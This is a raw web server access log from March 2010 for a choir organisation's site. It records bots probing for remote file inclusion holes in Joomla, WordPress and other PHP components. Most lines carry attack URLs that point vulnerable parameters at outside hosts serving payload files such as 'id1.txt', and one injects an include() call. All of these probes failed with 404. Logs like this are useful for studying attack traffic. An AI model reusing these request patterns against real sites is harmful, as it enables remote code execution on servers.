124.49.100.254 - - [09/Mar/2010:04:28:37 -0800] "GET /logs/access_100209.log//components/com_mambowiki/Mam***ogin.php?IP=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:29:07 -0800] "GET /logs/access_091213.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:29:12 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:04:29:22 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:29:28 -0800] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://reves.fr/idf/phpstreamvideo/videoPlayerManager2.as?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:29:29 -0800] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://reves.fr/idf/phpstreamvideo/videoPlayerManager2.as?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:29:29 -0800] "GET /logs/access_100116.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://reves.fr/idf/phpstreamvideo/videoPlayerManager2.as?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:29:31 -0800] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://reves.fr/idf/phpstreamvideo/videoPlayerManager2.as?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:29:31 -0800] "GET /logs/access_100116.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://reves.fr/idf/phpstreamvideo/videoPlayerManager2.as?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.2.21 - - [09/Mar/2010:04:29:31 -0800] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://reves.fr/idf/phpstreamvideo/videoPlayerManager2.as?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:30:02 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:30:47 -0800] "GET /logs/access_091029.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:30:51 -0800] "GET /logs/access_100130.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:30 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:31 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:32 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:36 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:36 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:36 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:36 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:36 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:31:36 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:33:04 -0800] "GET /logs/access_100112.log//board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:33:04 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:33:04 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:33:05 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:33:05 -0800] "GET /logs/access_100112.log//board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:33:05 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:35:06 -0800] "GET /logs/access_100117.log//board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.95.229.230 - - [09/Mar/2010:04:35:08 -0800] "GET /logs/access_100117.log//board//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:04:35:15 -0800] "GET /contenido.php?sec=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:04:35:15 -0800] "GET /logs/access_091029.log/contenido.php?sec=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:04:35:15 -0800] "GET /logs/contenido.php?sec=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:35:29 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:35:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:35:29 -0800] "GET /logs/access_091229.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:36:39 -0800] "GET /logs/access_100126.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:36:44 -0800] "GET /logs/access_100126.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:36:45 -0800] "GET /logs/access_100126.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:37:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:37:23 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:37:23 -0800] "GET /skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:38:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:38:35 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:38:35 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:38:40 -0800] "GET /logs/access_100117.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:38:44 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:38:55 -0800] "GET /logs/access_091229.log//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:39:09 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:39:09 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:39:09 -0800] "GET /logs/access.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:39:21 -0800] "GET /logs/access.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:39:21 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:04:39:21 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:39:42 -0800] "GET /logs/access_091229.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.195.115.217 - - [09/Mar/2010:04:40:09 -0800] "GET /xxxxxxx/ HTTP/1.0" 200 923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:41:33 -0800] "GET /components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:41:33 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:41:34 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:04:41:44 -0800] "GET /logs/access_091029.log%20%20/contenido.php?sec=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.2.241.49 - - [09/Mar/2010:04:42:59 -0800] "GET /logs/access_091229.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.enigma-knights.co.uk/mybb/images/groupimages/admin/gp/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:15 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:15 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:15 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:43:26 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:43:26 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:43:26 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:27 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:27 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:27 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:43:34 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:43:34 -0800] "GET /skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:43:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:44 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:54 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:58 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:58 -0800] "GET /logs/access_091029.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:43:59 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:44:07 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:44:07 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:44:07 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:44:11 -0800] "GET /logs/access_091229.log//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:44:22 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:45:15 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:45:15 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:45:15 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:45:57 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:45:57 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:45:57 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.222.43 - - [09/Mar/2010:04:46:04 -0800] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bk21.changwon.ac.kr/board/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
66.7.222.43 - - [09/Mar/2010:04:46:04 -0800] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bk21.changwon.ac.kr/board/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:46:26 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:46:26 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:46:26 -0800] "GET /components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:46:35 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:46:35 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:46:35 -0800] "GET /components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:47:27 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:47:43 -0800] "GET /logs/access_091029.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.189.224.16 - - [09/Mar/2010:04:48:49 -0800] "GET /logs/access_100130.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:48:50 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:48:51 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
